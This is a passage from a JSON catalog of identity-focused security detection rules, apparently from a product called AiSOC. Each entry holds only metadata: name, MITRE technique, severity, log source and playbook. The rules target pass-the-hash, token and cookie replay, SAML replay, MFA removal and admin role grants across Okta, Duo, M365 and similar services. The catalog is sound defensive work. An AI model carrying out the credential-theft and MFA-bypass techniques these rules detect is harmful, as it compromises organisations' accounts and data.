"1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.001" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-skeleton-key-encryption-downgrade.yaml" }, { "id": "det-identity-096", "type": "detection", "name": "Kerberos Pre-Auth Failure Spike From Host", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Kerberos Pre-Auth Failure Spike From Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-kerberos-failure-spike-from-host.yaml" }, { "id": "det-identity-097", "type": "detection", "name": "NTLM Authentication With Mismatched WorkstationName", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'NTLM Authentication With Mismatched WorkstationName'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1557.001" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ntlm-relay-indicator.yaml" }, { "id": "det-identity-098", "type": "detection", "name": "Privileged Account NTLM Logon From Untrusted Host", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Account NTLM Logon From Untrusted Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.002" ], "log_source": "active-directory", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ntlm-priv-account-from-untrusted.yaml" }, { "id": "det-identity-099", "type": "detection", "name": "Pass-The-Hash Indicator: NTLMv2 With NewCredentials", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Pass-The-Hash Indicator: NTLMv2 With NewCredentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550.002" ], "log_source": "active-directory", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pass-the-hash-anomalous-logon.yaml" }, { "id": "det-identity-100", "type": "detection", "name": "Pass-The-Ticket Indicator: TGT Source IP Mismatch", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Pass-The-Ticket Indicator: TGT Source IP Mismatch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550.003" ], "log_source": "active-directory", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-pass-the-ticket-anomalous-tgt-source.yaml" }, { "id": "det-identity-101", "type": "detection", "name": "Session Cookie Replayed From New Geo Within 1h", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Session Cookie Replayed From New Geo Within 1h'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1539" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-token-theft-cookie-replay.yaml" }, { "id": "det-identity-102", "type": "detection", "name": "OAuth Refresh Token Replayed From Different IP", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth Refresh Token Replayed From Different IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oauth-refresh-token-replay.yaml" }, { "id": "det-identity-103", "type": "detection", "name": "OAuth Access Token Used Before Issue +1s", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OAuth Access Token Used Before Issue +1s'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oauth-token-theft-impossible-time.yaml" }, { "id": "det-identity-104", "type": "detection", "name": "SAML Assertion Replayed Within Window", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'SAML Assertion Replayed Within Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1550" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-saml-assertion-replay.yaml" }, { "id": "det-identity-105", "type": "detection", "name": "SAML Assertion Issuer Mismatched", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'SAML Assertion Issuer Mismatched'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-saml-issuer-mismatch.yaml" }, { "id": "det-identity-106", "type": "detection", "name": "Okta Admin App Assigned To Many Users In Burst", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Admin App Assigned To Many Users In Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-admin-app-assigned-many-users.yaml" }, { "id": "det-identity-107", "type": "detection", "name": "Okta Policy Allows 'Everyone' Without MFA", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Policy Allows 'Everyone' Without MFA'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-policy-everyone-bypass-mfa.yaml" }, { "id": "det-identity-108", "type": "detection", "name": "Okta Trusted Network Zone Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Trusted Network Zone Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-network-zone-modified-trusted.yaml" }, { "id": "det-identity-109", "type": "detection", "name": "Okta Super Administrator Role Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Super Administrator Role Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "okta", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-superadmin-added.yaml" }, { "id": "det-identity-110", "type": "detection", "name": "Okta Login Marked Suspicious-Activity Behaviour", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Login Marked Suspicious-Activity Behaviour'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-suspicious-login-bot.yaml" }, { "id": "det-identity-111", "type": "detection", "name": "Okta App Sign-On Secret Rotated By Non-Admin", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta App Sign-On Secret Rotated By Non-Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "okta", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-app-secret-rotated-priv.yaml" }, { "id": "det-identity-112", "type": "detection", "name": "Okta MFA Factor Reset For Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta MFA Factor Reset For Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-mfa-factor-reset-priv.yaml" }, { "id": "det-identity-113", "type": "detection", "name": "Okta Sign-On Policy Deactivated", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Sign-On Policy Deactivated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1562.001" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-policy-deactivated.yaml" }, { "id": "det-identity-114", "type": "detection", "name": "Okta App Assigned With Federated External Domain", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta App Assigned With Federated External Domain'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1199" ], "log_source": "okta", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-app-assigned-foreign-domain.yaml" }, { "id": "det-identity-115", "type": "detection", "name": "Okta API Token Created With Admin Role", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta API Token Created With Admin Role'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "okta", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-api-token-created-priv.yaml" }, { "id": "det-identity-116", "type": "detection", "name": "Okta RADIUS Application Added", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta RADIUS Application Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1133" ], "log_source": "okta", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-radius-app-added.yaml" }, { "id": "det-identity-117", "type": "detection", "name": "Okta Mass User Deactivation", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Okta Mass User Deactivation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1531" ], "log_source": "okta", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-okta-mass-deactivate-users.yaml" }, { "id": "det-identity-118", "type": "detection", "name": "Auth0 Rule Added (Custom Code In Login Pipeline)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Rule Added (Custom Code In Login Pipeline)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "auth0", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-rule-added.yaml" }, { "id": "det-identity-119", "type": "detection", "name": "Auth0 Action Deployed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Action Deployed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "auth0", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-action-deployed.yaml" }, { "id": "det-identity-120", "type": "detection", "name": "Auth0 Management API Key Created", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Management API Key Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "auth0", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-management-api-key-created.yaml" }, { "id": "det-identity-121", "type": "detection", "name": "Auth0 Connection Deleted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Connection Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1485" ], "log_source": "auth0", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-connection-deleted.yaml" }, { "id": "det-identity-122", "type": "detection", "name": "Auth0 Anomaly Detection Disabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Auth0 Anomaly Detection Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1562.001" ], "log_source": "auth0", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-auth0-anomaly-detection-disabled.yaml" }, { "id": "det-identity-123", "type": "detection", "name": "Duo Bypass Code Generated", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Bypass Code Generated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "duo", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-bypass-code-generated.yaml" }, { "id": "det-identity-124", "type": "detection", "name": "Duo Policy Changed: MFA Requirement Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Policy Changed: MFA Requirement Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "duo", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-policy-changed-mfa-removed.yaml" }, { "id": "det-identity-125", "type": "detection", "name": "Duo Admin Created Via Self-Service Activation", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Admin Created Via Self-Service Activation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "duo", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-admin-added-from-self.yaml" }, { "id": "det-identity-126", "type": "detection", "name": "Duo Push Marked As Fraud By User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Push Marked As Fraud By User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "duo", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-fraud-reported.yaml" }, { "id": "det-identity-127", "type": "detection", "name": "Duo Application Set To Bypass Policy", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Duo Application Set To Bypass Policy'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "duo", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-duo-application-bypass-policy.yaml" }, { "id": "det-identity-128", "type": "detection", "name": "PingOne MFA Policy Removed", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingOne MFA Policy Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "ping", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-policy-mfa-removed.yaml" }, { "id": "det-identity-129", "type": "detection", "name": "PingOne Admin Role Burst Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingOne Admin Role Burst Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "ping", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-admin-role-burst.yaml" }, { "id": "det-identity-130", "type": "detection", "name": "PingID Device Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingID Device Removed From Privileged User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "ping", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-pingid-device-removed.yaml" }, { "id": "det-identity-131", "type": "detection", "name": "PingOne Policy Bypass Applied To 'Everyone'", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'PingOne Policy Bypass Applied To 'Everyone''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "ping", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-policy-bypass-everyone.yaml" }, { "id": "det-identity-132", "type": "detection", "name": "Ping Trust Store Certificate Added", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Ping Trust Store Certificate Added'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1553.004" ], "log_source": "ping", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-ping-trust-store-modified.yaml" }, { "id": "det-identity-133", "type": "detection", "name": "Keycloak Master Realm User Created", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak Master Realm User Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1136" ], "log_source": "keycloak", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-master-realm-user-created.yaml" }, { "id": "det-identity-134", "type": "detection", "name": "Keycloak realm-admin Role Granted", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak realm-admin Role Granted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "keycloak", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-admin-realm-role-grant.yaml" }, { "id": "det-identity-135", "type": "detection", "name": "Keycloak Client Secret Regenerated", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak Client Secret Regenerated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1098.001" ], "log_source": "keycloak", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-client-secret-regen.yaml" }, { "id": "det-identity-136", "type": "detection", "name": "Keycloak User Impersonation Used", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Keycloak User Impersonation Used'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "keycloak", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-keycloak-impersonation-used.yaml" }, { "id": "det-identity-137", "type": "detection", "name": "Generic OIDC Issuer Trust Modified", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Generic OIDC Issuer Trust Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "identity", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-issuer-trust-changed.yaml" }, { "id": "det-identity-138", "type": "detection", "name": "OIDC Client Burst Created By Single Actor", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OIDC Client Burst Created By Single Actor'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1136" ], "log_source": "identity", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-many-clients-from-single-actor.yaml" }, { "id": "det-identity-139", "type": "detection", "name": "OIDC Client Secret Logged In Plaintext", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OIDC Client Secret Logged In Plaintext'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1552.004" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-secret-leaked-pattern.yaml" }, { "id": "det-identity-140", "type": "detection", "name": "OIDC Client Configured With Wildcard Redirect URI", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'OIDC Client Configured With Wildcard Redirect URI'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1539" ], "log_source": "identity", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-oidc-redirect-uri-wildcard.yaml" }, { "id": "det-identity-141", "type": "detection", "name": "Google Workspace 2SV Disabled For Admin", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace 2SV Disabled For Admin'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "google-workspace", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-mfa-disabled-priv.yaml" }, { "id": "det-identity-142", "type": "detection", "name": "Google Workspace App Password Issued To Priv User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace App Password Issued To Priv User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "google-workspace", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-app-pw-issued.yaml" }, { "id": "det-identity-143", "type": "detection", "name": "Google Workspace 3rd-Party App Granted Drive Read", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace 3rd-Party App Granted Drive Read'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1528" ], "log_source": "google-workspace", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-3p-app-data-grant.yaml" }, { "id": "det-identity-144", "type": "detection", "name": "Google Workspace Login Flagged 'Suspicious'", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Google Workspace Login Flagged 'Suspicious''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "google-workspace", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-google-workspace-suspicious-login-flag.yaml" }, { "id": "det-identity-145", "type": "detection", "name": "M365 Inbox Rule Forwards To External Address", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 Inbox Rule Forwards To External Address'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1114.003" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-mailbox-rule-forward-external.yaml" }, { "id": "det-identity-146", "type": "detection", "name": "M365 Mailbox Permission Granted To External User", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 Mailbox Permission Granted To External User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1098" ], "log_source": "m365", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-mailbox-permission-add-foreign.yaml" }, { "id": "det-identity-147", "type": "detection", "name": "M365 App Granted Mail.Read / Mail.ReadWrite", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 App Granted Mail.Read / Mail.ReadWrite'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1528" ], "log_source": "m365", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-app-consent-graph-mail.yaml" }, { "id": "det-identity-148", "type": "detection", "name": "M365 SharePoint Sharing Policy 'Anyone' Enabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 SharePoint Sharing Policy 'Anyone' Enabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1530" ], "log_source": "m365", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-sharing-policy-anyone.yaml" }, { "id": "det-identity-149", "type": "detection", "name": "M365 Temporary Access Pass Generated For Priv", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'M365 Temporary Access Pass Generated For Priv'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "m365", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-m365-tap-removed-priv.yaml" }, { "id": "det-identity-150", "type": "detection", "name": "Slack Workspace 2FA Disabled", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Slack Workspace 2FA Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1556" ], "log_source": "slack", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-slack-workspace-2fa-disabled.yaml" }, { "id": "det-identity-151", "type": "detection", "name": "Slack App Installed With Bot Scope chat:write.public", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Slack App Installed With Bot Scope chat:write.public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1525" ], "log_source": "slack", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/ident-slack-app-installed-bot-token.yaml" }, { "id": "det-identity-152", "type": 